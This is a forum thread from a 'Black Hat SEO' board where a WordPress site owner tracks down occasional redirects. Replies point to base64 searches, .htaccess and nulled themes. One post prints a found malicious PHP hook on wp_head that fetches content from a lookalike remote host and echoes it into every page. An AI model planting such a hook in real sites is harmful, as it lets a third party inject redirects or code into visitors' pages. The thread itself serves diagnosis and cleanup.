1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to check if my site got SQL injected/hacked?

Discussion in 'Black Hat SEO' started by Russian-Czar, May 13, 2013.

  1. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    Sometimes(rarely) when I go to my domain it redirects it to a parked domain, when I retry it works fine. I happens rarely about 20 to 1. Not sure if its my computer or the site.



    How to check if my site got SQL injected or hacked some other way?
     
    • Thanks Thanks x 1
  2. cody41

    cody41 Power Member

    Joined:
    Jun 18, 2009
    Messages:
    682
    Likes Received:
    274
    Location:
    Texas
    if you're running a php based site, go ahead and search your theme or site code for base64 that shouldn't be there. That might be a good start
     
    • Thanks Thanks x 1
  3. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    Thanks for reply, Not sure how to do that, I will google it but if you could explain; are you talking about the .php files or the SQL database.
     
  4. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    Found the base64 in my PHP files

    Code:
    Timthumb.php  -  51.691 bytes  -  Sat, 12.01.13 at 21:43  -  \wp-content\Themes\THEME\
    13.502    // base64 encoded red image that says 'no hotlinkers'
    13.602    $imgData = base64_decode("R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=");
     class-feed.php  -  3.684 bytes  -  Thu, 22.11.12 at 00:23  -  \wp-includes\
    3.271    if ( $type & SIMPLEPIE_CONSTRUCT_BASE64 ) {
    3.293    $data = base64_decode( $data );
    
    
     class-http.php  -  58.772 bytes  -  Fri, 25.01.13 at 17:17  -  \wp-includes\
    46.547    return 'Proxy-Authorization: Basic ' . base64_encode( $this->authentication() );
     class-IXR.php  -  31.675 bytes  -  Wed, 15.08.12 at 14:12  -  \wp-includes\
    2.970    // Deal with IXR object types base64 and date
    3.155    if (is_object($this->data) && is_a($this->data, 'IXR_Base64')) {
    3.187    return 'base64';
    5.016    case 'base64':
    10.042    case 'base64':
    10.076    $value = base64_decode($this->_currentTagContents);
    25.459    * IXR_Base64
    25.513    class IXR_Base64
    25.555    function IXR_Base64($data)
    25.656    return '<base64>'.base64_encode($this->data).'</base64>';
    25.665    return '<base64>'.base64_encode($this->data).'</base64>';
    25.695    return '<base64>'.base64_encode($this->data).'</base64>';
    28.484    case 'base64':
    30.447    case 'base64':
    30.496    $return[] = new IXR_Base64('base64');
    30.504    $return[] = new IXR_Base64('base64');
     class-phpmailer.php  -  81.728 bytes  -  Mon, 25.06.12 at 21:54  -  \wp-includes\
    2.745    *  "8bit", "7bit", "binary", "base64", and "quoted-printable".
    48.985    public function AddAttachment($path, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    52.434    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    52.612    protected function EncodeFile($path, $encoding = 'base64') {
    53.774    * @param string $encoding The encoding to use; one of 'base64', '7bit', '8bit', 'binary', 'quoted-printable'
    53.924    public function EncodeString($str, $encoding = 'base64') {
    54.002    case 'base64':
    54.042    $encoded = chunk_split(base64_encode($str), 76, $this->LE);
    56.065    $encoded = $this->Base64EncodeWrapMB($str);
    56.125    $encoded = base64_encode($str);
    57.424    public function Base64EncodeWrapMB($str) {
    57.774    // Base64 has a 4:3 ratio
    58.062    $chunk = base64_encode($chunk);
    63.363    public function AddStringAttachment($string, $filename, $encoding = 'base64', $type = 'application/octet-stream') {
    64.373    public function AddEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = 'application/octet-stream') {
    64.986    public function AddStringEmbeddedImage($string, $cid, $filename = '', $encoding = 'base64', $type = 'application/octet-stream') {
    71.060    if ( $this->AddEmbeddedImage($basedir.$directory.$filename, md5($filename), $filename, 'base64', $mimeType) ) {
    77.921    return base64_encode($signature);
    80.309    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
    80.353    $DKIMb64  = base64_encode(pack("H*", sha1($body))) ; // Base64 of packed binary SHA-1 hash of body
     class-simplepie.php  -  90.453 bytes  -  Mon, 05.11.12 at 07:25  -  \wp-includes\
    7.558    * base64-encoded construct
    7.615    define('SIMPLEPIE_CONSTRUCT_BASE64', 8);
     class-smtp.php  -  24.618 bytes  -  Tue, 07.02.12 at 09:13  -  \wp-includes\
    7.639    fputs($this->smtp_conn, base64_encode($username) . $this->CRLF);
    8.154    fputs($this->smtp_conn, base64_encode($password) . $this->CRLF);
     class-snoopy.php  -  37.774 bytes  -  Wed, 27.10.10 at 03:54  - \wp-includes\
    25.678    $headers .= "Authorization: Basic ".base64_encode($this->user.":".$this->pass)."\r\n";
    25.841    $headers .= 'Proxy-Authorization: ' . 'Basic ' . base64_encode($this->proxy_user . ':' . $this->proxy_pass)."\r\n";
    30.573    $headers[] = "Authorization: BASIC ".base64_encode($this->user.":".$this->pass);
     File.php  -  9.678 bytes  -  Wed, 21.11.12 at 15:31  - \wp-includes\SimplePie\
    6.807    $out .= "Authorization: Basic " . base64_encode("$url_parts[user]:$url_parts[pass]") . "\r\n";
    
    
     Misc.php  -  51.559 bytes  -  Wed, 21.11.12 at 15:31  -  \wp-includes\SimplePie\
    40.331    if (isset($attribs['']['mode']) && strtolower(trim($attribs['']['mode']) === 'base64'))
    40.376    $mode = SIMPLEPIE_CONSTRUCT_BASE64;
    41.903    return SIMPLEPIE_CONSTRUCT_BASE64;
     Sanitize.php  -  15.703 bytes  -  Sun, 02.12.12 at 09:43  - \wp-includes\SimplePie\
    7.019    if ($type & SIMPLEPIE_CONSTRUCT_BASE64)
    7.044    $data = base64_decode($data);
     
  5. accelerator_dd

    accelerator_dd Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2010
    Messages:
    2,441
    Likes Received:
    1,005
    Occupation:
    SEO
    Location:
    IM Wonderland
    You need to post the actual base64 dumps, such as :
    R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YUZ\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=
    which is the only code you posted and is just an image from what i saw (red background, nothing else in there).

    You have a listing of all the places base64 is mentioned, trace those in the files and see what they are encoding/decoding, then post those values if you need help and we can try to see what the issue is.
     
    • Thanks Thanks x 1
  6. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    I checked the files and I don't see any base64 bumps. The only code is "R0lGODlhUAAMAIAAAP8AAP///yH5BAAHAP8ALAAAAABQAAwAAAJpjI+py+0Po5y0OgAMjjv01YU Z\nOGplhWXfNa6JCLnWkXplrcBmW+spbwvaVr/cDyg7IoFC2KbYVC2NQ5MQ4ZNao9Ynzjl9ScNYpneb\nDULB3RP 6JuPuaGfuuV4fumf8PuvqFyhYtjdoeFgAADs=" (the one you say is harmful) The rest of the files just use the keyword "base64"


    I have also installed a plugin that check if site is hacked or not an got this:

     
  7. twistedtrick

    twistedtrick Power Member

    Joined:
    Aug 21, 2009
    Messages:
    654
    Likes Received:
    376
    Location:
    United States
    I would check the backlinks for the parked domain in popular backlink checking tools, and see if your domain is seen as a backlink to it via redirect.
     
    • Thanks Thanks x 1
  8. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    I guess it was hacked found this in the source code:



     
  9. jr_sci

    jr_sci Senior Member

    Joined:
    Jan 30, 2010
    Messages:
    857
    Likes Received:
    686
    Occupation:
    CTO at Tiny Piglet Publishing, Bestselling Author
    Home Page:
    Get a penetration expert. He will charge you less than $100 to do the testing.
     
  10. Russian-Czar

    Russian-Czar Regular Member

    Joined:
    Feb 10, 2012
    Messages:
    218
    Likes Received:
    64
    I think I found it could someone confirm that this is is a hack/infected code?

    Code:
    <?php
        }
    }
    
    
    function wp__head() {
     if(function_exists('curl_init'))
     {
      $url = "http://www.jqury.net/?1"; 
      $ch = curl_init();  
      $timeout = 10;  
      curl_setopt($ch,CURLOPT_URL,$url); 
      curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
      curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
      curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); 
      $data = curl_exec($ch);  
      curl_close($ch); 
      echo "$data";
     }
    }
    add_action('wp_head', 'wp__head');
     
  11. serigoramos

    serigoramos Newbie

    Joined:
    Mar 13, 2013
    Messages:
    8
    Likes Received:
    0
    Occupation:
    tyguain
    Location:
    tyguain
    Home Page:
    I think yours is a pirated wp theme....and yes your site was hacked
     
  12. healzer

    healzer Jr. Executive VIP Jr. VIP Premium Member

    Joined:
    Jun 26, 2011
    Messages:
    2,364
    Likes Received:
    1,967
    Gender:
    Male
    Occupation:
    Marketing automation tools
    Location:
    Somewhere in Europe
    Home Page:
    Zdarova,

    W3Shield can help you out with this problem, if you are looking for a website scan or penetration test, let me know and we'll get everything ready for you!

    Have a great day!

    Cheers
    healzer
     
  13. Gogol

    Gogol Elite Member

    Joined:
    Sep 10, 2010
    Messages:
    3,066
    Likes Received:
    2,872
    Gender:
    Male
    Check your htaccess too...
     
  14. isnotcomplete

    isnotcomplete Newbie

    Joined:
    Apr 23, 2013
    Messages:
    42
    Likes Received:
    27
    just throwing this out there. but if you paste fb9735872 into google... look at the first link.
    happened to download it myself as well. works great and all, but had to get rid of that pesky redirect

    also, why don't you go on over to that jqury site, with the ?1 and all. then view source.

    :)

    last edit: ok ok. Ill divulge the info. Don't download ubermenu from that other bh site.
    he edited one of the js files to do that. pretty nifty if i do say so myself. but he is definitely doing it wronglol.
     
    Last edited: May 16, 2013
  15. LatteGrande

    LatteGrande Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 19, 2011
    Messages:
    1,957
    Likes Received:
    502
    Location:
    404 Not Found
    Mine got injected too! WTF! Have you found any solution to get them removed yet? or anyone can help?
     
  16. garthor

    garthor Newbie

    Joined:
    Mar 24, 2013
    Messages:
    48
    Likes Received:
    13
    I don't believe your website was actually hacked... although I don't know what platform you are running or anything, but I guess you are running a Wordpress website... as far I can tell by your reply, your website has some hidden html linking to other websites, most likely it's from a nulled wordpress theme or plugin... even some "reputable" plugins insert hidden links in your website, you can try changing your themes and/or disabling your plugins.

    I believe it's the same case scenario for the OP as well...

    Also make sure to take a look at your .htaccess file as there could be a redirect somewhere to another domain.